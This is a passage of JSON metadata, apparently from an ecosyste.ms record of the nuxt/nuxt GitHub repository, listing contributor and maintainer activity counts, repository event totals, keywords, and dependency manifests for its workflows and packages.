ogic":5,"martinszeltins":4,"94726":4,"imslepov":4,"sapphi-red":4,"clemcode":4,"danielrentz":4,"bjoaquinc":4,"mukundshah":4,"RokeAlvo":4,"romhml":4,"CodeMan62":4,"davidstackio":4,"ikxin":4,"ineshbose":4,"justsl":4,"typed-sigterm":4,"GalacticHypernova":4,"Yizack":4,"Norbiros":4,"Flo0806":4,"adamdehaven":3,"vmrjnvc":3,"danielkellyio":3,"peterbud":3,"danielphilipjohnson":2,"CharleeWa":2,"Nonolanlan1007":2,"kyohei-23":2,"paulmelero":2,"dennisadriaans":2,"stephiescastle":2,"Lilja":2,"JonathanSchndr":2,"john-psina":2,"ThimoDEV":2,"KUN1007":2,"guska8":2,"schirrel":2,"TimoCuijpers":2,"Tamas-hi":2,"zync09":2,"IsraelOrtuno":2,"oimo23":2,"dargmuesli":2,"franklin-tina":2,"guspan-tanadi":2,"zshimanchik":2,"imreegall":2,"lansi951":2,"wzc520pyfm":2,"ilyaliao":2,"paranoidPhantom":2,"felixgabler":2,"farnabaz":2,"niklaswolf":2,"mrleblanc101":2,"unguul":2,"dwood-csi":2,"ivansky":2,"adamcikado":2,"idorenyinudoh":2,"watsonhaw5566":2,"DavidFrings":2,"mxmxmmgg":2,"xc6pm":2,"crisarji":2,"yeskunall":2,"daniluk4000":2,"WonderBerry":2,"mmeester":2,"pi0":2,"Maxttier":2,"blowsie":2,"matt-clegg":2,"florian-strasser":2,"sxzz":2,"ShayanTheNerd":2,"MikeBellika":2,"cram0":2,"jcppman":2,"niklas-wortmann":2,"s1gr1d":2,"phojie":2,"jhony1104":2,"derHodrig":2,"claytonchew":2,"Tofandel":2,"Nimit012":2,"Koshux":2,"Vahagn-Zaqaryan":2,"sofuxro":2,"iegik":2,"krank56":2,"emmron":2,"EvgenyWas":2,"hywax":2,"RBV1":2,"hacknug":2,"Kornil":2,"lihbr":2,"bootsmann1995":2,"lgcardeas":2,"luxterful":2,"mianlang":2,"Buzut":2,"SparK-Cruz":2,"EfraimGENC":2,"Ibra-cesar":2,"JJPSeno":2,"benmccann":2,"lehni":2,"jeffreyvdhondel":2,"skmedix":2,"djixadin":2,"awfulness":2,"cybercoder-naj":2,"mak7an":2,"Dobefu":2,"marr":1,"luc122c":1,"semibroiled":1,"maoberlehner":1,"Aietes":1,"Flamenate":1,"stephenjason89":1,"ablaszkiewicz":1,"HP8585":1,"vachmara":1,"izzygld":1,"ram-skrrrtskrrrt":1,"jackylamhk":1,"ChiaHanTu":1,"xanzhu":1,"AloisSeckar":1,"Rich-Harris":1,"igorexa34314":1,"mustafa60x":1,"naokihaba":1,"hillaryke":1,"freb97":1,"OskarLebuda":1,"Revadike":1,"TonyFresneau":1,"maxkcy":1,"IlyaSemenov":1,"GerryWilko":1,"aussieboi":1,"BenjaminOddou":1,"Aurion72":1,"toooni":1,"9romise":1,"Eazash":1,"maxmaxme":1,"dgxo":1,"wuiyang":1,"mehrazmorshed":1,"8ctavio":1,"larbish":1,"buglavecz":1}},"maintainers":[{"table":{"login":"danielroe","count":1324,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"}},{"table":{"login":"huang-julien","count":364,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"}},{"table":{"login":"DamianGlowala","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"}},{"table":{"login":"pi0","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"}},{"table":{"login":"Mini-ghost","count":92,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"}},{"table":{"login":"manniL","count":76,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"}},{"table":{"login":"BobbieGoede","count":70,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"}},{"table":{"login":"antfu","count":63,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"}},{"table":{"login":"userquin","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"}},{"table":{"login":"cernymatej","count":44,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"}},{"table":{"login":"TheAlexLichter","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"}},{"table":{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"}},{"table":{"login":"wattanx","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"}},{"table":{"login":"Atinux","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"}},{"table":{"login":"ineshbose","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"}},{"table":{"login":"atinux","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"}},{"table":{"login":"productdevbook","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"}},{"table":{"login":"dargmuesli","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"}},{"table":{"login":"Hebilicious","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"}},{"table":{"login":"warflash","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"}},{"table":{"login":"lihbr","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"}},{"table":{"login":"madebyfabian","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"}},{"table":{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"}},{"table":{"login":"KazariEX","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"}},{"table":{"login":"posva","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"}},{"table":{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"}},{"table":{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"}},{"table":{"login":"farnabaz","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"}},{"table":{"login":"arashsheyda","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"}},{"table":{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"}},{"table":{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"}},{"table":{"login":"msmakouz","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/msmakouz"}},{"table":{"login":"kazupon","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kazupon"}},{"table":{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"}},{"table":{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"}}],"active_maintainers":[{"table":{"login":"danielroe","count":469,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"}},{"table":{"login":"huang-julien","count":116,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"}},{"table":{"login":"Mini-ghost","count":86,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"}},{"table":{"login":"cernymatej","count":42,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"}},{"table":{"login":"BobbieGoede","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"}},{"table":{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"}},{"table":{"login":"DamianGlowala","count":31,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"}},{"table":{"login":"TheAlexLichter","count":27,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"}},{"table":{"login":"userquin","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"}},{"table":{"login":"antfu","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"}},{"table":{"login":"atinux","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"}},{"table":{"login":"productdevbook","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"}},{"table":{"login":"wattanx","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"}},{"table":{"login":"ineshbose","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"}},{"table":{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"}},{"table":{"login":"KazariEX","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"}},{"table":{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"}},{"table":{"login":"dargmuesli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"}},{"table":{"login":"lihbr","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"}},{"table":{"login":"pi0","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"}},{"table":{"login":"farnabaz","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"}},{"table":{"login":"manniL","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"}},{"table":{"login":"Hebilicious","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"}}]}},"events":{"total":{"ForkEvent":529,"CreateEvent":965,"CommitCommentEvent":6,"ReleaseEvent":27,"IssuesEvent":2447,"WatchEvent":3815,"DeleteEvent":947,"MemberEvent":2,"IssueCommentEvent":11148,"PushEvent":3554,"PullRequestReviewCommentEvent":1117,"PullRequestReviewEvent":2626,"PullRequestEvent":2589},"last_year":{"ForkEvent":532,"CreateEvent":968,"CommitCommentEvent":7,"ReleaseEvent":27,"IssuesEvent":2453,"WatchEvent":3822,"DeleteEvent":951,"MemberEvent":2,"IssueCommentEvent":11186,"PushEvent":3559,"PullRequestReviewCommentEvent":1123,"PullRequestReviewEvent":2642,"PullRequestEvent":2597}},"keywords":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"dependencies":[{"ecosystem":"actions","filepath":".github/workflows/issue-comment-created.yml","sha":null,"kind":"manifest","created_at":"2026-03-18T13:06:23.065Z","updated_at":"2026-03-18T13:06:23.065Z","repository_link":"https://github.com/nuxt/nuxt/blob/main/.github/workflows/issue-comment-created.yml","dependencies":[]},{"ecosystem":"npm","filepath":"test/fixtures/minimal-pages/package.json","sha":null,"kind":"manifest","created_at":"2026-03-18T13:06:28.684Z","updated_at":"2026-03-18T13:06:28.684Z","repository_link":"https://github.com/nuxt/nuxt/blob/main/test/fixtures/minimal-pages/package.json","dependencies":[{"id":25842038254,"package_name":"nuxt","ecosystem":"npm","requirements":"workspace:*","direct":true,"kind":"runtime","optional":false}]},{"ecosystem":"npm","filepath":"packages/nitro-server/package.json","sha":null,"kind":"manifest","created_at":"2026-03-18T13:06:23.646Z","updated_at":"2026-03-18T13:06:23.646Z","repository_link":"https://github.com/nuxt/nuxt/blob/main/packages/nitro-server/package.json","dependencies":[{"id":25842038191,"package_name":"@babel/plugin-syntax-typescript","ecosystem":"npm","requirements":"^7.28.6","direct":true,"kind":"runtime","optional":false},{"id":25842038192,"package_name":"@nuxt/kit","ecosystem":"npm","requirements":"workspace:*","direct":true,"kind":"runtime","optional":false},{"id":25842038193,"package_name":"@unhead/vue","ecosystem":"npm","requirements":"^2.1.12","direct":true,"kind":"runtime","optional":false},{"id":25842038195,"package_name":"@vue/shared","ecosystem":"npm","requirements":"^3.5.30","direct":true,"kind":"runtime","optional":false},{"id":25842038196,"package_name":"consola","ecosystem":"npm","requirements":"^3.4.2","direct":true,"kind":"runtime","optional":false},{"id":25842038197,"package_name":"defu","ecosystem":"npm","requirements":"^6.1.4","direct":true,"kind":"runtime","optional":false},{"id":25842038198,"package_name":"destr","ecosystem":"npm","requirements":"^2.0.5","direct":true,"kind":"runtime","optional":false},{"id":25842038199,"package_name":"devalue","ecosystem":"npm","requirements":"^5.6.4","direct":true,"kind":"runtime","optional":false},{"id":25842038200,"package_name":"errx","ecosystem":"npm","requirements":"^0.1.0","direct":true,"kind":"runtime","optional":false},{"id":25842038203,"package_name":"escape-string-regexp","ecosystem":"npm","requirements":"^5.0.0","direct":true,"kind":"runtime","optional":false},{"id":25842038204,"package_name":"exsolve","ecosystem":"npm","requirements":"^1.0.8","direct":true,"kind":"runtime","optional":false},{"id":25842038205,"package_name":"impound","ecosystem":"npm","requirements":"^1.1.5","direct":true,"kind":"runtime","optional":false},{"id":25842038206,"package_name":"klona","ecosystem":"npm","requirements":"^2.0.6","direct":true,"kind":"runtime","optional":false},{"id":25842038220,"package_name":"knitwork","ecosystem":"npm","requirements":"^1.3.0","direct":true,"kind":"runtime","optional":false},{"id":25842038222,"package_name":"lru-cache","ecosystem":"npm","requirements":"^11.2.7","direct":true,"kind":"runtime","optional":false},{"id":25842038223,"package_name":"mlly","ecosystem":"npm","requirements":"^1.8.1","direct":true,"kind":"runtime","optional":false},{"id":25842038224,"package_name":"mocked-exports","ecosystem":"npm","requirements":"^0.1.1","direct":true,"kind":"runtime","optional":false},{"id":25842038227,"package_name":"nitro","ecosystem":"npm","requirements":"^3.0.260311-beta","direct":true,"kind":"runtime","optional":false},{"id":25842038229,"package_name":"ohash","ecosystem":"npm","requirements":"^2.0.11","direct":true,"kind":"runtime","optional":false},{"id":25842038230,"package_name":"pathe","ecosystem":"npm","requirements":"^2.0.3","direct":true,"kind":"runtime","optional":false},{"id":25842038231,"package_name":"rou3","ecosystem":"npm","requirements":"^0.8.1","direct":true,"kind":"runtime","optional":false},{"id":25842038233,"package_name":"srvx","ecosystem":"npm","requirements":"^0.11.12","direct":true,"kind":"runtime","optional":false},{"id":25842038235,"package_name":"std-env","ecosystem":"npm","requirements":"^4.0.0","direct":true,"kind":"runtime","optional":false},{"id":25842038236,"package_name":"ufo","ecosystem":"npm","requirements":"^1.6.3","direct":true,"kind":"runtime","optional":false},{"id":25842038237,"package_name":"unctx","ecosystem":"npm","requirements":"^2.5.0","direct":true,"kind":"runtime","optional":false},{"id":25842038238,"package_name":"unstorage","ecosystem":"npm","requirements":"^2.0.0-alpha.6","direct":true,"kind":"runtime","optional":false},{"id":25842038239,"package_name":"vue","ecosystem":"npm","requirements":"^3.5.30","direct":true,"kind":"runtime","optional":false},{"id":25842038240,"package_name":"vue-bundle-renderer","ecosystem":"npm","requirements":"^2.2.0","direct":true,"kind":"runtime","optional":false},{"id":25842038242,"package_name":"vue-devtools-stub","ecosystem":"npm","requirements":"^0.1.0","direct":true,"kind":"runtime","optional":false},{"id":25842038243,"package_name":"@babel/plugin-proposal-decorators","ecosystem":"npm","requirements":"7.29.0","direct":true,"kind":"development","optional":false},{"id":25842038246,"package_name":"@nuxt/schema","ecosystem":"npm","requirements":"workspace:*","direct":true,"kind":"development","optional":false},{"id":25842038247,"package_name":"@rollup/plugin-babel","ecosystem":"npm","requirements":"7.0.0","direct":true,"kind":"development","optional":false},{"id":25842038248,"package_name":"hookable","ecosystem":"npm","requirements":"6.1.0","direct":true,"kind":"development","optional":false},{"id":25842038250,"package_name":"nuxt","ecosystem":"npm","requirements":"workspace:*","direct":true,"kind":"development","optional":false},{"id":25842038251,"package_name":"obuild","ecosystem":"npm","requirements":"0.4.32","direct":true,"kind":"development","optional":false},{"id":25842038252,"package_name":"vitest","ecosystem":"npm","requirements":"4.0.18","direct":true,"kind":"development","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/issue-labelled.yml","sha":null,"kind":"manifest","created_at":"2026-03-18T13:06:23.179Z","updated_at":"2026-03-18T13:06:23.179Z","repository_link":"https://github.com/nuxt/nuxt/blob/main/.github/workflows/issue-labelled.yml","dependencies":[{"id":25842038187,"package_name":"actions/github-script","ecosystem":"actions","requirements":"ed597411d8f924073f98dfc5c65a23a2325f34cd","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/issue-opened.yml","sha":null,"kind":"manifest","created_at":"2026-03-18T13:06:23.255Z","updated_at":"2026-03-18T13:06:23.255Z","repository_link":"https://github.com/nuxt/nuxt/blob/main/.github/workflows/issue-opened.yml","dependencies":[]},{"ecosystem":"actions","filepath":".github/workflows/gh-ai-moderator.yml","sha":null,"kind":"manifest","created_at":"2026-03-18T13:06:22.811Z","updated_at":"2026-03-18T13:06:22.811Z","repository_link":"https://github.com/nuxt/nuxt/blob/main/.github/workflows/gh-ai-moderator.yml","dependencies":[{"id":25842038181,"package_name":"actions/checkout","ecosystem":"actions","requirements":"de0fac2e4500dabe0009e67214ff5f5447ce83dd","direct":true,"kind":"composite","optional":false},{"id":25842038182,"package_name":"github/ai-moderator","ecosystem":"actions","requirements":"81159c370785e295c97461ade67d7c33576e9319","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/team-triage.yml","sha":null,"kind":"manifest","created_at":"2026-03-18T13:06:23.486Z","updated_at":"2026-03-18T13:06:23.486Z","repository_link":"https://github.com/nuxt/nuxt/blob/main/.github/workflows/team-triage.yml","dependencies":[{"id":25842038189,"package_name":"actions/github-script","ecosystem":"actions","requirements":"ed597411d8f924073f98dfc5c65a23a2325f34cd","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"npm","filepath":"packages/nuxt/test/package-fixture/pkg/package.json","sha":null,"kind":"manifest","created_at":"2026-03-18T13:06:28.301Z","updated_at":"2026-03-18T13:06:28.301Z","repository_link":"https://github.com/nuxt/nuxt/blob/main/packages/nuxt/test/package-fixture/pkg/package.json","dependencies":[]},{"ecosystem":"npm","filepath":"packages/nuxt/test/package-fixture/root/node_modules/pkg/package.json","sha":null,"kind":"manifest","created_at":"2026-03-18T13:06:28.358Z","updated_at":"2026-03-18T13:06:28.358Z","repository_link":"https://github.com/nuxt/nuxt/blob/main/packages/nuxt/test/package-fixture/root/node_modules/pkg/package.json","dependencies":[]},{"ecosystem":"npm","filepath":"test/fixtures/lazy-hydration/package.json","sha":null,"kind":"manifest","created_at":"2026-03-18T13:06:28.603Z","updated_at":"2026-03-18T13:06:28.603Z","repository_link":"https://github.com/nuxt/nuxt/blob/main/test/fixtures/lazy-hydration/package.json","dependencies":[{"id":25842038253,"package_name":"nuxt","ecosystem":"npm","requirements":"workspace:*","direct":true,"kind":"runtime","optional":false}]},{"ecosystem":"npm","filepath":"pnpm-workspace.yaml","sha":null,"kind":"manifest","created_at":"2026-03-18T13:06:28.508Z","updated_at":"2026-03-18T13:06:28.508Z","repository_link":"https://github.com/nuxt/nuxt/blob/main/pnpm-workspace.yaml","dependencies":[]},{"ecosystem":"actions","filepath":".github/workflows/notify-nuxt-website.yml","sha":null,"kind":"manifest","created_at":"2026-03-18T13:06:23.362Z","updated_at":"2026-03-18T13:06:23.362Z","repository_link":"https://github.com/nuxt/nuxt/blob/main/.github/workflows/notify-nuxt-website.yml","dependencies":[]},{"ecosystem":"npm","filepath":"docs/package.json","sha":null,"kind":"manifest","created_at":"2026-03-18T13:06:23.566Z","updated_at":"2026-03-18T13:06:23.566Z","repository_link":"https://github.com/nuxt/nuxt/blob/main/docs/package.json","dependencies":[]},{"ecosystem":"actions","filepath":".github/workflows/issue-edited.yml","sha":null,"kind":"manifest","created_at":"2026-03-18T13:06:23.125Z","updated_at":"2026-03-18T13:06:23.125Z","repository_link":"https://github.com/nuxt/nuxt/blob/main/.github/workflows/issue-edited.yml","dependencies":[]},{"ecosystem":"actions","filepath":".github/workflows/autofix-docs.yml","sha":null,"kind":"manifest","created_at":"2023-09-22T09:08:52.201Z","updated_at":"2023-09-22T09:08:52.201Z","repository_link":"https://github.com/nuxt/nuxt/blob/main/.github/workflows/autofix-docs.yml","dependencies":[{"id":13870344428,"package_name":"actions/checkout","ecosystem":"actions","requirements":"3df4ab11eba7bda6032a0b82a6bb43b11571feac","direct":true,"kind":"composite","optional":false},{"id":13870344429,"package_name":"actions/setup-node","ecosystem":"actions","requirements":"5e21ff4d9bc1a8cf6de233a3057d20ec6b3fb69d","direct":true,"kind":"composite","optional":false},{"id":13870344430,"package_name":"autofix-ci/action","ecosystem":"actions","requirements":"8caa572fd27b0019a65e4c695447089c8d3138b9","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/autofix.yml","sha":null,"kind":"manifest","created_at":"2023-09-22T09:08:53.146Z","updated_at":"2023-09-22T09:08:53.146Z","repository_link":"https://github.com/nuxt/nuxt/blob/main/.github/workflows/autofix.yml","dependencies":[{"id":13870344559,"package_name":"actions/checkout","ecosystem":"actions","requirements":"3df4ab11eba7bda6032a0b82a6bb43b11571feac","direct":true,"kind":"composite","optional":false},{"id":13870344564,"package_name":"actions/setup-node","ecosystem":"actions","requirements":"5e21ff4d9bc1a8cf6de233a3057d20ec6b3fb69d","direct":true,"kind":"composite","optional":false},{"id":13870344566,"package_name":"autofix-ci/action","ecosystem":"actions","requirements":"8caa572fd27b0019a65e4c695447089c8d3138b9","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/ci.yml","sha":null,"kind":"manifest","created_at":"2023-09-22T09:08:54.869Z","updated_at":"2023-09-22T09:08:54.869Z","repository_link":"https://github.com/nuxt/nuxt/blob/main/.github/workflows/ci.yml","dependencies":[{"id":13870345387,"package_name":"actions/checkout","ecosystem":"actions","requirements":"3df4ab11eba7bda6032a0b82a6bb43b11571feac","direct":true,"kind":"composite","optional":false},{"id":13870345388,"package_name":"actions/setup-node","ecosystem":"actions","requirements":"5e21ff4d9bc1a8cf6de233a3057d20ec6b3fb69d","direct":true,"kind":"composite","optional":false},{"id":13870345389,"package_name":"actions/upload-artifact","ecosystem":"actions","requirements":"a8a3f3ad30e3422c9c7b888a15615d19a852ae32","direct":true,"kind":"composite","optional":false},{"id":13870345390,"package_name":"github/codeql-action/init","ecosystem":"actions","requirements":"6a28655e3dcb49cb0840ea372fd6d17733edd8a4","direct":true,"kind":"composite","optional":false},{"id":13870345391,"package_name":"actions/download-artifact","ecosystem":"actions","requirements":"9bc31d5ccc31df68ecc42ccf4149144866c47d8a","direct":true,"kind":"composite","optional":false},{"id":13870345392,"package_name":"github/codeql-action/analyze","ecosystem":"actions","requirements":"6a28655e3dcb49cb0840ea372fd6d17733edd8a4","direct":true,"kind":"composite","optional":false},{"id":13870345393,"package_name":"actions/cache","ecosystem":"actions","requirements":"704facf57e6136b1bc63b828d79edcd491f0ee84","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/dependency-review.yml","sha":null,"kind":"manifest","created_at":"2023-09-22T09:08:55.768Z","updated_at":"2023-09-22T09:08:55.768Z","repository_link":"https://github.com/nuxt/nuxt/blob/main/.github/workflows/dependency-review.yml","dependencies":[{"id":13870345404,"package_name":"actions/checkout","ecosystem":"actions","requirements":"3df4ab11eba7bda6032a0b82a6bb43b11571feac","direct":true,"kind":"composite","optional":false},{"id":13870345405,"package_name":"actions/dependency-review-action","ecosystem":"actions","requirements":"6c5ccdad469c9f8a2996bfecaec55a631a347034","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/docs.yml","sha":null,"kind":"manifest","created_at":"2023-09-22T09:08:56.037Z","updated_at":"2023-09-22T09:08:56.037Z","repository_link":"https://github.com/nuxt/nuxt/blob/main/.github/workflows/docs.yml","dependencies":[{"id":13870345409,"package_name":"actions/checkout","ecosystem":"actions","requirements":"3df4ab11eba7bda6032a0b82a6bb43b11571feac","direct":true,"kind":"composite","optional":false},{"id":13870345410,"package_name":"actions/setup-node","ecosystem":"actions","requirements":"5e21ff4d9bc1a8cf6de233a3057d20ec6b3fb69d","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/ecosystem-ci-trigger.yml","sha":null,"kind":"manifest","created_at":"2023-09-22T09:08:56.361Z","updated_at":"2023-09-22T09:08:56.361Z","repository_link":"https://github.com/nuxt/nuxt/blob/main/.github/workflows/ecosystem-ci-trigger.yml","dependencies":[{"id":13870346528,"package_name":"actions/github-script","ecosystem":"actions","requirements":"d7906e4ad0b1822421a7e6a35d5ca353c962f410","direct":true,"kind":"composite","optional":false},{"id":13870346529,"package_name":"tibdex/github-app-token","ecosystem":"actions","requirements":"3beb63f4bd073e61482598c45c71c1019b59b73a","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/scorecards.yml","sha":null,"kind":"manifest","created_at":"2023-09-22T09:08:59.205Z","updated_at":"2023-09-22T09:08:59.205Z","repository_link":"https://github.com/nuxt/nuxt/blob/main/.github/workflows/scorecards.yml","dependencies":[{"id":13870348017,"package_name":"actions/checkout","ecosystem":"actions","requirements":"3df4ab11eba7bda6032a0b82a6bb43b11571feac","direct":true,"kind":"composite","optional":false},{"id":13870348018,"package_name":"ossf/scorecard-action","ecosystem":"actions","requirements":"08b4669551908b1024bb425080c797723083c031","direct":true,"kind":"composite","optional":false},{"id":13870348019,"package_name":"actions/upload-artifact","ecosystem":"actions","requirements":"a8a3f3ad30e3422c9c7b888a15615d19a852ae32","direct":true,"kind":"composite","optional":false},{"id":13870348020,"package_name":"github/codeql-action/upload-sarif","ecosystem":"actions","requirements":"6a28655e3dcb49cb0840ea372fd6d17733edd8a4","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/semantic-pull-requests.yml","sha":null,"kind":"manifest","created_at":"2023-09-22T09:09:00.005Z","updated_at":"2023-09-22T09:09:00.005Z","repository_link":"https://github.com/nuxt/nuxt/blob/main/.github/workflows/semantic-pull-requests.yml","dependencies":[{"id":13870348031,"package_name":"amannn/action-semantic-pull-request","ecosystem":"actions","requirements":"c3cd5d1ea3580753008872425915e343e351ab54","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"docker","filepath":".devcontainer/Dockerfile","sha":null,"kind":"manifest","created_at":"2023-09-22T09:09:00.303Z","updated_at":"2023-09-22T09:09:00.303Z","repository_link":"https://github.com/nuxt/nuxt/blob/main/.devcontainer/Dockerfile","dependencies":[{"id":13870348042,"package_name":"node","ecosystem":"docker","requirements":"lts","direct":true,"kind":"build","optional":false}]},{"ecosystem":"npm","filepath":"package.json","sha":null,"kind":"manifest","created_at":"2023-09-22T09:09:01.061Z","updated_at":"2023-09-22T09:09:01.061Z","repository_link":"https://github.com/nuxt/nuxt/blob/main/package.json","dependencies":[{"id":13870348044,"package_name":"@nuxt/test-utils","ecosystem":"npm","requirements":"workspace:*","direct":true,"kind":"development","optional":false},{"id":13870348045,"package_name":"@nuxt/webpack-builder","ecosystem":"npm","requirements":"workspace:*","direct":true,"kind":"development","optional":false},{"id":13870348046,"package_name":"@nuxtjs/eslint-config-typescript","ecosystem":"npm","requirements":"12.1.0","direct":true,"kind":"development","optional":false},{"id":13870348047,"package_name":"@types/fs-extra","ecosystem":"npm","requirements":"11.0.2","direct":true,"kind":"development","optional":false},{"id":13870348048,"package_name":"@types/node","ecosystem":"npm","requirements":"18.17.18","direct":true,"kind":"development","optional":false},{"id":13870348049,"package_name":"@types/semver","ecosystem":"npm","requirements":"7.5.2","direct":true,"kind":"development","optional":false},{"id":13870348050,"package_name":"case-police","ecosystem":"npm","requirements":"0.6.1","direct":true,"kind":"development","optional":false},{"id":13870348051,"package_name":"changelogen","ecosystem":"npm","requirements":"0.5.5","direct":true,"kind":"development","optional":false},{"id":13870348052,"package_name":"consola","ecosystem":"npm","requirements":"3.2.3","direct":true,"kind":"development","optional":false},{"id":13870348053,"package_name":"devalue","ecosystem":"npm","requirements":"4.3.2","direct":true,"kind":"development","optional":false},{"id":13870348054,"package_name":"eslint","ecosystem":"npm","requirements":"8.49.0","direct":true,"kind":"development","optional":false},{"id":13870348055,"package_name":"eslint-plugin-import","ecosystem":"npm","requirements":"2.28.1","direct":true,"kind":"development","optional":false},{"id":13870348056,"package_name":"eslint-plugin-jsdoc","ecosystem":"npm","requirements":"41.1.2","direct":true,"kind":"development","optional":false},{"id":13870348057,"package_name":"eslint-plugin-no-only-tests","ecosystem":"npm","requirements":"3.1.0","direct":true,"kind":"development","optional":false},{"id":13870348058,"package_name":"execa","ecosystem":"npm","requirements":"7.2.0","direct":true,"kind":"development","optional":false},{"id":13870348059,"package_name":"fs-extra","ecosystem":"npm","requirements":"11.1.1","direct":true,"kind":"development","optional":false},{"id":13870348060,"package_name":"globby","ecosystem":"npm","requirements":"13.2.2","direct":true,"kind":"development","optional":false},{"id":13870348061,"package_name":"h3","ecosystem":"npm","requirements":"1.8.1","direct":true,"kind":"development","optional":false},{"id":13870348062,"package_name":"happy-dom","ecosystem":"npm","requirements":"12.1.5","direct":true,"kind":"development","optional":false},{"id":13870348063,"package_name":"jiti","ecosystem":"npm","requirements":"1.20.0","direct":true,"kind":"development","optional":false},{"id":13870348064,"package_name":"markdownlint-cli","ecosystem":"npm","requirements":"^0.33.0","direct":true,"kind":"development","optional":false},{"id":